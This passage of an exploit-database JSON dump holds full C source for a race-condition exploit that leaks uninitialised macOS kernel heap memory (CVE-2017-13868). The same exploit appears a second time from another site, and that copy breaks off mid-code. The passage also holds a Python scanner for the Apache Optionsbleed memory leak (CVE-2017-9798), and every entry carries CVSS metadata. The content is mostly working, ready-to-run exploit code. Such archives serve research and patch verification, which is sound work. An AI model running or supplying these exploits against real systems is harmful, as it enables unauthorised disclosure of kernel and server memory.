High Sierra 10.13 - ctl_ctloutput-leak Information Leak", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-12-07T00:00:00", "title": "Apple macOS High Sierra 10.13 - ctl_ctloutput-leak Information Leak", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13868"], "modified": "2017-12-07T00:00:00", "id": "EXPLOITPACK:415A901F9BC5DABDC36EDFC6E3924DAC", "href": "", "sourceData": "/*\n * ctl_ctloutput-leak.c\n * Brandon Azad\n *\n * CVE-2017-13868\n *\n * While looking through the source code of XNU version 4570.1.46, I noticed that the function\n * ctl_ctloutput() in the file bsd/kern/kern_control.c does not check the return value of\n * sooptcopyin(), which makes it possible to leak the uninitialized contents of a kernel heap\n * allocation to user space. Triggering this information leak requires root privileges.\n *\n * The ctl_ctloutput() function is called when a userspace program calls getsockopt(2) on a kernel\n * control socket. The relevant code does the following:\n * (a) It allocates a kernel heap buffer for the data parameter to getsockopt(), without\n * specifying the M_ZERO flag to zero out the allocated bytes.\n * (b) It copies in the getsockopt() data from userspace using sooptcopyin(), filling the data\n * buffer just allocated. This copyin is supposed to completely overwrite the allocated data,\n * which is why the M_ZERO flag was not needed. However, the return value of sooptcopyin() is\n * not checked, which means it is possible that the copyin has failed, leaving uninitialized\n * data in the buffer. The copyin could fail if, for example, the program passed an unmapped\n * address to getsockopt().\n * (c) The code then calls the real getsockopt() implementation for this kernel control socket.\n * This implementation should process the input buffer, possibly modifying it and shortening\n * it, and return a result code. However, the implementation is free to assume that the\n * supplied buffer has already been initialized (since theoretically it comes from user\n * space), and hence several implementations don't modify the buffer at all. The NECP\n * function necp_ctl_getopt(), for example, just returns 0 without processing the data buffer\n * at all.\n * (d) Finally, if the real getsockopt() implementation doesn't return an error, ctl_ctloutput()\n * calls sooptcopyout() to copy the data buffer back to user space.\n *\n * Thus, by specifying an unmapped data address to getsockopt(2), we can cause a heap buffer of a\n * controlled size to be allocated, prevent the contents of that buffer from being initialized, and\n * then reach a call to sooptcopyout() that tries to write that buffer back to the unmapped\n * address. All we need to do for the copyout to succeed is remap that address between the calls to\n * sooptcopyin() and sooptcopyout(). If we can do that, then we will leak uninitialized kernel heap\n * data to userspace.\n *\n * It turns out that this is a pretty easy race to win. While testing on my 2015 Macbook Pro, the\n * mean number of attempts to win the race was never more than 600, and the median was never more\n * than 5. (This testing was conducted with DEBUG off, since the printfs dramatically slow down the\n * exploit.)\n *\n * This program exploits this vulnerability to leak data from a kernel heap buffer of a\n * user-specified size. No attempt is made to seed the heap with interesting data. Tested on macOS\n * High Sierra 10.13 (build 17A365).\n *\n * Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44234.zip\n *\n */\n#if 0\n\tif (sopt->sopt_valsize && sopt->sopt_val) {\n\t\tMALLOC(data, void *, sopt->sopt_valsize, M_TEMP,\t// (a) data is allocated\n\t\t\tM_WAITOK);\t\t\t\t\t// without M_ZERO.\n\t\tif (data == NULL)\n\t\t\treturn (ENOMEM);\n\t\t/*\n\t\t * 4108337 - copy user data in case the\n\t\t * kernel control needs it\n\t\t */\n\t\terror = sooptcopyin(sopt, data,\t\t\t\t// (b) sooptcopyin() is\n\t\t\tsopt->sopt_valsize, sopt->sopt_valsize);\t// called to fill the\n\t}\t\t\t\t\t\t\t\t// buffer; the return\n\tlen = sopt->sopt_valsize;\t\t\t\t\t// value is ignored.\n\tsocket_unlock(so, 0);\n\terror = (*kctl->getopt)(kctl->kctlref, kcb->unit,\t\t// (c) The getsockopt()\n\t\t\tkcb->userdata, sopt->sopt_name,\t\t\t// implementation is\n\t\t\t\tdata, &len);\t\t\t\t// called to process\n\tif (data != NULL && len > sopt->sopt_valsize)\t\t\t// the buffer.\n\t\tpanic_plain(\"ctl_ctloutput: ctl %s returned \"\n\t\t\t\"len (%lu) > sopt_valsize (%lu)\\n\",\n\t\t\t\tkcb->kctl->name, len,\n\t\t\t\tsopt->sopt_valsize);\n\tsocket_lock(so, 0);\n\tif (error == 0) {\n\t\tif (data != NULL)\n\t\t\terror = sooptcopyout(sopt, data, len);\t\t// (d) If (c) succeeded,\n\t\telse\t\t\t\t\t\t\t// then the data buffer\n\t\t\tsopt->sopt_valsize = len;\t\t\t// is copied out to\n\t}\t\t\t\t\t\t\t\t// userspace.\n#endif\n\n#include <errno.h>\n#include <mach/mach.h>\n#include <netinet/in.h>\n#include <pthread.h>\n#include <stdbool.h>\n#include <stdint.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <sys/ioctl.h>\n#include <unistd.h>\n\n#if __x86_64__\n\n// ---- Header files not available on iOS ---------------------------------------------------------\n\n#include <mach/mach_vm.h>\n#include <sys/sys_domain.h>\n#include <sys/kern_control.h>\n\n#else /* __x86_64__ */\n\n// If we're not on x86_64, then we probably don't have access to the above headers. The following\n// definitions are copied directly from the macOS header files.\n\n// ---- Definitions from mach/mach_vm.h -----------------------------------------------------------\n\nextern\nkern_return_t mach_vm_allocate\n(\n\tvm_map_t target,\n\tmach_vm_address_t *address,\n\tmach_vm_size_t size,\n\tint flags\n);\n\nextern\nkern_return_t mach_vm_deallocate\n(\n\tvm_map_t target,\n\tmach_vm_address_t address,\n\tmach_vm_size_t size\n);\n\n// ---- Definitions from sys/sys_domain.h ---------------------------------------------------------\n\n#define SYSPROTO_CONTROL\t2\t/* kernel control protocol */\n\n#define AF_SYS_CONTROL\t\t2\t/* corresponding sub address type */\n\n// ---- Definitions from sys/kern_control.h -------------------------------------------------------\n\n#define CTLIOCGINFO _IOWR('N', 3, struct ctl_info)\t/* get id from name */\n\n#define MAX_KCTL_NAME\t96\n\nstruct ctl_info {\n u_int32_t\tctl_id;\t\t\t\t\t/* Kernel Controller ID */\n char\tctl_name[MAX_KCTL_NAME];\t\t/* Kernel Controller Name (a C string) */\n};\n\nstruct sockaddr_ctl {\n u_char\tsc_len;\t\t/* depends on size of bundle ID string */\n u_char\tsc_family;\t/* AF_SYSTEM */\n u_int16_t \tss_sysaddr;\t/* AF_SYS_KERNCONTROL */\n u_int32_t\tsc_id; \t\t/* Controller unique identifier */\n u_int32_t \tsc_unit;\t/* Developer private unit number */\n u_int32_t \tsc_reserved[5];\n};\n\n#endif /* __x86_64__ */\n\n// ---- Definitions from bsd/net/necp.h -----------------------------------------------------------\n\n#define\tNECP_CONTROL_NAME \"com.apple.net.necp_control\"\n\n// ---- Macros ------------------------------------------------------------------------------------\n\n#if DEBUG\n#define DEBUG_TRACE(fmt, ...)\tprintf(fmt\"\\n\", ##__VA_ARGS__)\n#else\n#define DEBUG_TRACE(fmt, ...)\n#endif\n\n#define ERROR(fmt, ...)\t\tprintf(\"Error: \"fmt\"\\n\", ##__VA_ARGS__)\n\n// ---- Kernel heap infoleak ----------------------------------------------------------------------\n\n// A callback block that will be called each time kernel data is leaked. leak_data and leak_size\n// are the kernel data that was leaked and the size of the leak. This function should return true\n// to finish and clean up, false to retry the leak.\ntypedef bool (^kernel_leak_callback_block)(const void *leak_data, size_t leak_size);\n\n// Open the control socket for com.apple.necp. Requires root privileges.\nstatic bool open_necp_control_socket(int *necp_ctlfd) {\n\tint ctlfd = socket(PF_SYSTEM, SOCK_DGRAM, SYSPROTO_CONTROL);\n\tif (ctlfd < 0) {\n\t\tERROR(\"Could not create a system control socket: errno %d\", errno);\n\t\treturn false;\n\t}\n\tstruct ctl_info ctlinfo = { .ctl_id = 0 };\n\tstrncpy(ctlinfo.ctl_name, NECP_CONTROL_NAME, sizeof(ctlinfo.ctl_name));\n\tint err = ioctl(ctlfd, CTLIOCGINFO, &ctlinfo);\n\tif (err) {\n\t\tclose(ctlfd);\n\t\tERROR(\"Could not retrieve the control ID number for %s: errno %d\",\n\t\t\t\tNECP_CONTROL_NAME, errno);\n\t\treturn false;\n\t}\n\tstruct sockaddr_ctl addr = {\n\t\t.sc_len = sizeof(addr),\n\t\t.sc_family = AF_SYSTEM,\n\t\t.ss_sysaddr = AF_SYS_CONTROL,\n\t\t.sc_id = ctlinfo.ctl_id, // com.apple.necp\n\t\t.sc_unit = 0, // Let the kernel pick the control unit.\n\t};\n\terr = connect(ctlfd, (struct sockaddr *)&addr, sizeof(addr));\n\tif (err) {\n\t\tclose(ctlfd);\n\t\tERROR(\"Could not connect to the NECP control system (ID %d) \"\n\t\t\t\t\"unit %d: errno %d\", addr.sc_id, addr.sc_unit, errno);\n\t\treturn false;\n\t}\n\t*necp_ctlfd = ctlfd;\n\treturn true;\n}\n\n// Allocate a virtual memory region at the address pointed to by map_address. If map_address points\n// to a NULL address, then the allocation is created at an arbitrary address which is stored in\n// map_address on return.\nstatic bool allocate_map_address(void **map_address, size_t map_size) {\n\tmach_vm_address_t address = (mach_vm_address_t) *map_address;\n\tbool get_address = (address == 0);\n\tint flags = (get_address ? VM_FLAGS_ANYWHERE : VM_FLAGS_FIXED);\n\tkern_return_t kr = mach_vm_allocate(mach_task_self(), &address, map_size, flags);\n\tif (kr != KERN_SUCCESS) {\n\t\tERROR(\"Could not allocate virtual memory: mach_vm_allocate %d: %s\",\n\t\t\t\tkr, mach_error_string(kr));\n\t\treturn false;\n\t}\n\tif (get_address) {\n\t\t*map_address = (void *)address;\n\t}\n\treturn true;\n}\n\n// Deallocate the mapping created by allocate_map_address.\nstatic void deallocate_map_address(void *map_address, size_t map_size) {\n\tmach_vm_deallocate(mach_task_self(), (mach_vm_address_t) map_address, map_size);\n}\n\n// Context for the map_address_racer thread.\nstruct map_address_racer_context {\n\tpthread_t thread;\n\tvolatile bool running;\n\tvolatile bool deallocated;\n\tvolatile bool do_map;\n\tvolatile bool restart;\n\tbool success;\n\tvoid * address;\n\tsize_t size;\n};\n\n// The racer thread. This thread will repeatedly: (a) deallocate the address; (b) spin until do_map\n// is true; (c) allocate the address; (d) spin until the main thread sets restart to true or\n// running to false. If the thread encounters an internal error, it sets success to false and\n// exits.\nstatic void *map_address_racer(void *arg) {\n\tstruct map_address_racer_context *context = arg;\n\twhile (context->running) {\n\t\t// Deallocate the address.\n\t\tdeallocate_map_address(context->address, context->size);\n\t\tcontext->deallocated = true;\n\t\t// Wait for do_map to become true.\n\t\twhile (!context->do_map) {}\n\t\tcontext->do_map = false;\n\t\t// Do a little bit of work so that the allocation is more likely to take place at\n\t\t// the right time.\n\t\tclose(-1);\n\t\t// Re-allocate the address. If this fails, abort.\n\t\tbool success = allocate_map_address(&context->address, context->size);\n\t\tif (!success) {\n\t\t\tcontext->success = false;\n\t\t\tbreak;\n\t\t}\n\t\t// Wait while we're still running and not told to restart.\n\t\twhile (context->running && !context->restart) {}\n\t\tcontext->restart = false;\n\t};\n\treturn NULL;\n}\n\n// Start the map_address_racer thread.\nstatic bool start_map_address_racer(struct map_address_racer_context *context, size_t leak_size) {\n\t// Allocate the initial block of memory, fixing the address.\n\tcontext->address = NULL;\n\tcontext->size = leak_size;\n\tif (!allocate_map_address(&context->address, context->size)) {\n\t\tgoto fail_0;\n\t}\n\t// Start the racer thread.\n\tcontext->running = true;\n\tcontext->deallocated = false;\n\tcontext->do_map = false;\n\tcontext->restart = false;\n\tcontext->success = true;\n\tint err = pthread_create(&context->thread, NULL, map_address_racer, context);\n\tif (err) {\n\t\tERROR(\"Could not create map_address_racer thread: errno %d\", err);\n\t\tgoto fail_1;\n\t}\n\treturn true;\nfail_1:\n\tdeallocate_map_address(context->address, context->size);\nfail_0:\n\treturn false;\n}\n\n// Stop the map_address_racer thread.\nstatic void stop_map_address_racer(struct map_address_racer_context *context) {\n\t// Exit the thread.\n\tcontext->running = false;\n\tcontext->do_map = true;\n\tpthread_join(context->thread, NULL);\n\t// Deallocate the memory.\n\tdeallocate_map_address(context->address, context->size);\n}\n\n// Try the NECP leak once. Returns true if the leak succeeded.\nstatic bool try_necp_leak(int ctlfd, struct map_address_racer_context *context) {\n\tsocklen_t length = context->size;\n\t// Wait for the map to be deallocated.\n\twhile (!context->deallocated) {};\n\tcontext->deallocated = false;\n\t// Signal the racer to do the mapping.\n\tcontext->do_map = true;\n\t// Try to trigger the leak.\n\tint err = getsockopt(ctlfd, SYSPROTO_CONTROL, 0, context->address, &length);\n\tif (err) {\n\t\tDEBUG_TRACE(\"Did not allocate in time\");\n\t\treturn false;\n\t}\n\t// Most of the time we end up here: allocating too early. If the first two words are both\n\t// 0, then assume we didn't make the leak. We need the leak size to be at least 16 bytes.\n\tuint64_t *data = context->address;\n\tif (data[0] == 0 && data[1] == 0) {\n\t\treturn false;\n\t}\n\t// WOW! It worked!\n\treturn true;\n}\n\n// Repeatedly try the NECP leak, until either we succeed or hit the maximum retry limit.\nstatic bool try_necp_leak_repeat(int ctlfd, kernel_leak_callback_block kernel_leak_callback,\n\t\tstruct map_address_racer_context *context) {\n\tconst size_t MAX_TRIES = 10000000;\n\tbool has_leaked = false;\n\tfor (size_t try = 1;; try++) {\n\t\t// Try the leak once.\n\t\tif (try_necp_leak(ctlfd, context)) {\n\t\t\tDEBUG_TRACE(\"Triggered the leak after %zu %s!\", try,\n\t\t\t\t\t(try == 1 ? \"try\" : \"tries\"));\n\t\t\ttry = 0;\n\t\t\thas_leaked = true;\n\t\t\t// Give the leak to the callback, and finish if it says we're done.\n\t\t\tif (kernel_leak_callback(context->address, context->size)) {\n\t\t\t\treturn true;\n\t\t\t}\n\t\t}\n\t\t// If we haven't successfully leaked anything after MAX_TRIES attempts, give up.\n\t\tif (!has_leaked && try >= MAX_TRIES) {\n\t\t\tERROR(\"Giving up after %zu unsuccessful leak attempts\", try);\n\t\t\treturn false;\n\t\t}\n\t\t// Reset for another try.\n\t\tcontext->restart = true;\n\t}\n}\n\n// Leak kernel heap data repeatedly until the callback function returns true.\nstatic bool leak_kernel_heap(size_t leak_size, kernel_leak_callback_block kernel_leak_callback) {\n\tconst size_t MIN_LEAK_SIZE = 16;\n\tbool success = false;\n\tif (leak_size < MIN_LEAK_SIZE) {\n\t\tERROR(\"Target leak size too small; must be at least %zu bytes\", MIN_LEAK_SIZE);\n\t\tgoto fail_0;\n\t}\n\tint ctlfd;\n\tif (!open_necp_control_socket(&ctlfd)) {\n\t\tgoto fail_0;\n\t}\n\tstruct map_address_racer_context context;\n\tif (!start_map_address_racer(&context, leak_size)) {\n\t\tgoto fail_1;\n\t}\n\tif (!try_necp_leak_repeat(ctlfd, kernel_leak_callback, &context)) {\n\t\tgoto fail_2;\n\t}\n\tsuccess = true;\nfail_2:\n\tstop_map_address_racer(&context);\nfail_1:\n\tclose(ctlfd);\nfail_0:\n\treturn success;\n}\n\n// ---- Main --------------------------------------------------------------------------------------\n\n// Dump data to stdout.\nstatic void dump(const void *data, size_t size) {\n\tconst uint8_t *p = data;\n\tconst uint8_t *end = p + size;\n\tunsigned off = 0;\n\twhile (p < end) {\n\t\tprintf(\"%06x: %02x\", off & 0xffffff, *p++);\n\t\tfor (unsigned i = 1; i < 16 && p < end; i++) {\n\t\t\tbool space = (i % 8) == 0;\n\t\t\tprintf(\" %s%02x\", (space ? \" \" : \"\"), *p++);\n\t\t}\n\t\tprintf(\"\\n\");\n\t\toff += 16;\n\t}\n}\n\nint main(int argc, const char *argv[]) {\n\t// Parse the arguments.\n\tif (argc != 2) {\n\t\tERROR(\"Usage: %s <leak-size>\", argv[0]);\n\t\treturn 1;\n\t}\n\tchar *end;\n\tsize_t leak_size = strtoul(argv[1], &end, 0);\n\tif (*end != 0) {\n\t\tERROR(\"Invalid leak size '%s'\", argv[1]);\n\t\treturn 1;\n\t}\n\t// Try to leak interesting data from the kernel.\n\tconst size_t MAX_TRIES = 50000;\n\t__block size_t try = 1;\n\t__block bool leaked = false;\n\tbool success = leak_kernel_heap(leak_size, ^bool (const void *leak, size_t size) {\n\t\t// Try to find an kernel pointer in the leak.\n\t\tconst uint64_t *p = leak;\n\t\tfor (size_t i = 0; i < size / sizeof(*p); i++) {\n\t\t\tif (p[i] >> 48 == 0xffff) {\n\t\t\t\tdump(leak, size);\n\t\t\t\tleaked = true;\n\t\t\t\treturn true;\n\t\t\t}\n\t\t}\n#if DEBUG\n\t\t// Show this useless leak anyway.\n\t\tDEBUG_TRACE(\"Boring leak:\");\n\t\tdump(leak, size);\n#endif\n\t\t// If we've maxed out, just bail.\n\t\tif (try >= MAX_TRIES) {\n\t\t\tERROR(\"Could not leak interesting data after %zu attempts\", try);\n\t\t\treturn true;\n\t\t}\n\t\ttry++;\n\t\treturn false;\n\t});\n\treturn (success && leaked ? 0 : 1);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:03", "description": "\nApache 2.2.34 2.4.27 - OPTIONS Memory Leak", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2017-09-18T00:00:00", "title": "Apache 2.2.34 2.4.27 - OPTIONS Memory Leak", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9798"], "modified": "2017-09-18T00:00:00", "id": "EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D", "href": "", "sourceData": "#!/usr/bin/env python3\n\n# Optionsbleed proof of concept test\n# by Hanno B\u00f6ck\n\nimport argparse\nimport urllib3\nimport re\n\n\ndef test_bleed(url, args):\n r = pool.request('OPTIONS', url)\n try:\n allow = str(r.headers[\"Allow\"])\n except KeyError:\n return False\n if allow in dup:\n return\n dup.append(allow)\n if allow == \"\":\n print(\"[empty] %s\" % (url))\n elif re.match(\"^[a-zA-Z]+(-[a-zA-Z]+)? *(, *[a-zA-Z]+(-[a-zA-Z]+)? *)*$\", allow):\n z = [x.strip() for x in allow.split(',')]\n if len(z) > len(set(z)):\n print(\"[duplicates] %s: %s\" % (url, repr(allow)))\n elif args.all:\n print(\"[ok] %s: %s\" % (url, repr(allow)))\n elif re.match(\"^[a-zA-Z]+(-[a-zA-Z]+)? *( +[a-zA-Z]+(-[a-zA-Z]+)? *)+$\", allow):\n print(\"[spaces] %s: %s\" % (url, repr(allow)))\n else:\n print(\"[bleed] %s: %s\" % (url, repr(allow)))\n return True\n\n\nparser = argparse.ArgumentParser(\n description='Check for the Optionsbleed vulnerability (CVE-2017-9798).',\n epilog=\"Tests server for Optionsbleed bug and other bugs in the allow header.\\n\\n\"\n \"Autmatically checks http://, https://, http://www. and https://www. -\\n\"\n \"except if you pass -u/--url (which means by default we check 40 times.)\\n\\n\"\n \"Explanation of results:\\n\"\n \"[bleed] corrupted header found, vulnerable\\n\"\n \"[empty] empty allow header, does not make sense\\n\"\n \"[spaces] space-separated method list (should be comma-separated)\\n\"\n \"[duplicates] duplicates in list (may be apache bug 61207)\\n\"\n \"[ok] normal list found (only shown with -a/--all)\\n\",\n formatter_class=argparse.RawTextHelpFormatter)\nparser.add_argument('hosttocheck', action='store',\n help='The hostname you want to test against')\nparser.add_argument('-n', nargs=1, type=int, default=[10],\n help='number of tests (default 10)')\nparser.add_argument(\"-a\", \"--all\", action=\"store_true\",\n help=\"show headers from hosts without problems\")\nparser.add_argument(\"-u\", \"--url\", action='store_true',\n help=\"pass URL instead of hostname\")\nargs = parser.parse_args()\nhowoften = int(args.n[0])\n\ndup = []\n\n# Note: This disables warnings about the lack of certificate verification.\n# Usually this is a bad idea, but for this tool we want to find vulnerabilities\n# even if they are shipped with invalid certificates.\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\npool = urllib3.PoolManager(10, cert_reqs='CERT_NONE')\n\nif args.url:\n test_bleed(args.hosttocheck, args)\nelse:\n for prefix in ['http://', 'http://www.', 'https://', 'https://www.']:\n for i in range(howoften):\n try:\n if test_bleed(prefix+args.hosttocheck, args) is False:\n break\n except Exception as e:\n pass", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2018-03-06T22:08:06", "description": "Exploit for macOS platform in category local exploits", "cvss3": {}, "published": "2018-03-03T00:00:00", "type": "zdt", "title": "Apple macOS HighSierra 10.13 - ctl_ctloutput-leak Information Leak Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-13868"], "modified": "2018-03-03T00:00:00", "id": "1337DAY-ID-29935", "href": "https://0day.today/exploit/description/29935", "sourceData": "/*\r\n * ctl_ctloutput-leak.c\r\n * Brandon Azad\r\n *\r\n * CVE-2017-13868\r\n *\r\n * While looking through the source code of XNU version 4570.1.46, I noticed that the function\r\n * ctl_ctloutput() in the file bsd/kern/kern_control.c does not check the return value of\r\n * sooptcopyin(), which makes it possible to leak the uninitialized contents of a kernel heap\r\n * allocation to user space. Triggering this information leak requires root privileges.\r\n *\r\n * The ctl_ctloutput() function is called when a userspace program calls getsockopt(2) on a kernel\r\n * control socket. The relevant code does the following:\r\n * (a) It allocates a kernel heap buffer for the data parameter to getsockopt(), without\r\n * specifying the M_ZERO flag to zero out the allocated bytes.\r\n * (b) It copies in the getsockopt() data from userspace using sooptcopyin(), filling the data\r\n * buffer just allocated. This copyin is supposed to completely overwrite the allocated data,\r\n * which is why the M_ZERO flag was not needed. However, the return value of sooptcopyin() is\r\n * not checked, which means it is possible that the copyin has failed, leaving uninitialized\r\n * data in the buffer. The copyin could fail if, for example, the program passed an unmapped\r\n * address to getsockopt().\r\n * (c) The code then calls the real getsockopt() implementation for this kernel control socket.\r\n * This implementation should process the input buffer, possibly modifying it and shortening\r\n * it, and return a result code. However, the implementation is free to assume that the\r\n * supplied buffer has already been initialized (since theoretically it comes from user\r\n * space), and hence several implementations don't modify the buffer at all. The NECP\r\n * function necp_ctl_getopt(), for example, just returns 0 without processing the data buffer\r\n * at all.\r\n * (d) Finally, if the real getsockopt() implementation doesn't return an error, ctl_ctloutput()\r\n * calls sooptcopyout() to copy the data buffer back to user space.\r\n *\r\n * Thus, by specifying an unmapped data address to getsockopt(2), we can cause a heap buffer of a\r\n * controlled size to be allocated, prevent the contents of that buffer from being initialized, and\r\n * then reach a call to sooptcopyout() that tries to write that buffer back to the unmapped\r\n * address. All we need to do for the copyout to succeed is remap that address between the calls to\r\n * sooptcopyin() and sooptcopyout(). If we can do that, then we will leak uninitialized kernel heap\r\n * data to userspace.\r\n *\r\n * It turns out that this is a pretty easy race to win. While testing on my 2015 Macbook Pro, the\r\n * mean number of attempts to win the race was never more than 600, and the median was never more\r\n * than 5. (This testing was conducted with DEBUG off, since the printfs dramatically slow down the\r\n * exploit.)\r\n *\r\n * This program exploits this vulnerability to leak data from a kernel heap buffer of a\r\n * user-specified size. No attempt is made to seed the heap with interesting data. Tested on macOS\r\n * High Sierra 10.13 (build 17A365).\r\n *\r\n * Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44234.zip\r\n *\r\n */\r\n#if 0\r\n if (sopt->sopt_valsize && sopt->sopt_val) {\r\n MALLOC(data, void *, sopt->sopt_valsize, M_TEMP, // (a) data is allocated\r\n M_WAITOK); // without M_ZERO.\r\n if (data == NULL)\r\n return (ENOMEM);\r\n /*\r\n * 4108337 - copy user data in case the\r\n * kernel control needs it\r\n */\r\n error = sooptcopyin(sopt, data, // (b) sooptcopyin() is\r\n sopt->sopt_valsize, sopt->sopt_valsize); // called to fill the\r\n } // buffer; the return\r\n len = sopt->sopt_valsize; // value is ignored.\r\n socket_unlock(so, 0);\r\n error = (*kctl->getopt)(kctl->kctlref, kcb->unit, // (c) The getsockopt()\r\n kcb->userdata, sopt->sopt_name, // implementation is\r\n data, &len); // called to process\r\n if (data != NULL && len > sopt->sopt_valsize) // the buffer.\r\n panic_plain(\"ctl_ctloutput: ctl %s returned \"\r\n \"len (%lu) > sopt_valsize (%lu)\\n\",\r\n kcb->kctl->name, len,\r\n sopt->sopt_valsize);\r\n socket_lock(so, 0);\r\n if (error == 0) {\r\n if (data != NULL)\r\n error = sooptcopyout(sopt, data, len); // (d) If (c) succeeded,\r\n else // then the data buffer\r\n sopt->sopt_valsize = len; // is copied out to\r\n } // userspace.\r\n#endif\r\n \r\n#include <errno.h>\r\n#include <mach/mach.h>\r\n#include <netinet/in.h>\r\n#include <pthread.h>\r\n#include <stdbool.h>\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <sys/ioctl.h>\r\n#include <unistd.h>\r\n \r\n#if __x86_64__\r\n \r\n// ---- Header files not available on iOS ---------------------------------------------------------\r\n \r\n#include <mach/mach_vm.h>\r\n#include <sys/sys_domain.h>\r\n#include <sys/kern_control.h>\r\n \r\n#else /* __x86_64__ */\r\n \r\n// If we're not on x86_64, then we probably don't have access to the above headers. The following\r\n// definitions are copied directly from the macOS header files.\r\n \r\n// ---- Definitions from mach/mach_vm.h -----------------------------------------------------------\r\n \r\nextern\r\nkern_return_t mach_vm_allocate\r\n(\r\n vm_map_t target,\r\n mach_vm_address_t *address,\r\n mach_vm_size_t size,\r\n int flags\r\n);\r\n \r\nextern\r\nkern_return_t mach_vm_deallocate\r\n(\r\n vm_map_t target,\r\n mach_vm_address_t address,\r\n mach_vm_size_t size\r\n);\r\n \r\n// ---- Definitions from sys/sys_domain.h ---------------------------------------------------------\r\n \r\n#define SYSPROTO_CONTROL 2 /* kernel control protocol */\r\n \r\n#define AF_SYS_CONTROL 2 /* corresponding sub address type */\r\n \r\n// ---- Definitions from sys/kern_control.h -------------------------------------------------------\r\n \r\n#define CTLIOCGINFO _IOWR('N', 3, struct ctl_info) /* get id from name */\r\n \r\n#define MAX_KCTL_NAME 96\r\n \r\nstruct ctl_info {\r\n u_int32_t ctl_id; /* Kernel Controller ID */\r\n char ctl_name[MAX_KCTL_NAME]; /* Kernel Controller Name (a C string) */\r\n};\r\n \r\nstruct sockaddr_ctl {\r\n u_char sc_len; /* depends on size of bundle ID string */\r\n u_char sc_family; /* AF_SYSTEM */\r\n u_int16_t ss_sysaddr; /* AF_SYS_KERNCONTROL */\r\n u_int32_t sc_id; /* Controller unique identifier */\r\n u_int32_t sc_unit; /* Developer private unit number */\r\n u_int32_t sc_reserved[5];\r\n};\r\n \r\n#endif /* __x86_64__ */\r\n \r\n// ---- Definitions from bsd/net/necp.h -----------------------------------------------------------\r\n \r\n#define NECP_CONTROL_NAME \"com.apple.net.necp_control\"\r\n \r\n// ---- Macros ------------------------------------------------------------------------------------\r\n \r\n#if DEBUG\r\n#define DEBUG_TRACE(fmt, ...) printf(fmt\"\\n\", ##__VA_ARGS__)\r\n#else\r\n#define DEBUG_TRACE(fmt, ...)\r\n#endif\r\n \r\n#define ERROR(fmt, ...) printf(\"Error: \"fmt\"\\n\", ##__VA_ARGS__)\r\n \r\n// ---- Kernel heap infoleak ----------------------------------------------------------------------\r\n \r\n// A callback block that will be called each time kernel data is leaked. leak_data and leak_size\r\n// are the kernel data that was leaked and the size of the leak. This function should return true\r\n// to finish and clean up, false to retry the leak.\r\ntypedef bool (^kernel_leak_callback_block)(const void *leak_data, size_t leak_size);\r\n \r\n// Open the control socket for com.apple.necp. Requires root privileges.\r\nstatic bool open_necp_control_socket(int *necp_ctlfd) {\r\n int ctlfd = socket(PF_SYSTEM, SOCK_DGRAM, SYSPROTO_CONTROL);\r\n if (ctlfd < 0) {\r\n ERROR(\"Could not create a system control socket: errno %d\", errno);\r\n return false;\r\n }\r\n struct ctl_info ctlinfo = { .ctl_id = 0 };\r\n strncpy(ctlinfo.ctl_name, NECP_CONTROL_NAME, sizeof(ctlinfo.ctl_name));\r\n int err = ioctl(ctlfd, CTLIOCGINFO, &ctlinfo);\r\n if (err) {\r\n close(ctlfd);\r\n ERROR(\"Could not retrieve the control ID number for %s: errno %d\",\r\n NECP_CONTROL_NAME, errno);\r\n return false;\r\n }\r\n struct sockaddr_ctl addr = {\r\n .sc_len = sizeof(addr),\r\n .sc_family = AF_SYSTEM,\r\n .ss_sysaddr = AF_SYS_CONTROL,\r\n .sc_id = ctlinfo.ctl_id, // com.apple.necp\r\n .sc_unit = 0, // Let the kernel pick the control unit.\r\n };\r\n err = connect(ctlfd, (struct sockaddr *)&addr, 